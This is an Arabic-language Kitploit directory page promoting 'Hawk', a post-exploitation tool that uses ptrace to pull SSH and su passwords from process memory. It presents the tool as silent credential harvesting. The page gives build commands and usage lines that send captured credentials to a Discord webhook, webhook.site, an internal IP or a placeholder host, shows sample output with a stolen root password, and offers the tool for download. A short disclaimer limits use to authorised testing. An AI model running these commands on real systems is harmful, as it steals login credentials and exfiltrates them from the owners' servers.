Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Hawk — أداة مكتوبة بلغة Golang مصممة لاستخراج كلمات المرور التي يتم العثور عليها عبر خدمتي sshd وsu | Kitploit
أدوات/GitHubGitHub/prodefense/hawk
هجمات كلمات المرورتسريب البياناتجمع المعلوماتما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubprodefense/hawk

Hawk

أداة مكتوبة بلغة Golang مصممة لاستخراج كلمات المرور التي يتم العثور عليها عبر خدمتي sshd وsu

عرض المستودع
386منذ 8 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة



Hawk

اعتراض صامت لبيانات اعتماد SSH و SU في الوقت الفعلي

يراقب Hawk عمليات sshd و su، ويستخرج كلمات المرور من الذاكرة عبر ptrace دون تعديل العمليات المستهدفة. صفر كتابة. حصاد نقي للبيانات الاعتمادية بطريقة القراءة فقط.

عرض توضيحي

Example

كيف يعمل

يستفيد Hawk من نظام ملفات /proc في لينكس لاكتشاف عمليات SSH و SU، ثم يستخدم ptrace للإرفاق بالعمليات والاعتراض على استدعاءات النظام. عند حدوث مصادقة بكلمة مرور، يقرأ كلمة المرور مباشرة من ذاكرة العملية أثناء استدعاء النظام write() — بشفافية تامة تجاه العملية المستهدفة. تُسرَّب البيانات الاعتمادية عبر webhook أو تُطبع إلى stdout.

تعمّق: مقالة المدونة

البناء

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk

الاستخدام

Discord Webhook

يكتشف Hawk ويب هوكات Discord تلقائيًا ويرسل رسائل منسقة:

root@kitploit:~
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN

الإعداد: أنشئ ويب هوكًا في خادم Discord الخاص بك باتباع دليل ويب هوكات Discord. ستظهر البيانات الاعتمادية في قناتك منسقة مع اسم المضيف واسم المستخدم وكلمة المرور.

ويب هوكات عامة

لخدمات ويب هوك الأخرى (webhook.site، خوادم مخصصة، إلخ):

root@kitploit:~
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id

# HTTP
./hawk http://192.168.1.100:6969/webhook

# Auto HTTPS if no protocol specified
./hawk webhook.example.com/path

وضع stdout

لا يوجد ويب هوك؟ تُطبع البيانات الاعتمادية إلى stdout:

root@kitploit:~
./hawk

الإخراج:

root@kitploit:~
hostname=server01 username=root password=SuperSecret123

المتطلبات

  • نظام لينكس مع تفعيل ptrace
  • نظام ملفات /proc مركّب
  • صلاحيات الجذر (مطلوبة لـ ptrace)

إخلاء مسؤولية

هذه الأداة مخصصة لاختبارات الأمان المصرح بها وللأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

شكر وتقدير

مستوحاة من أعمال blendin على 3snake.

تنزيل الأداة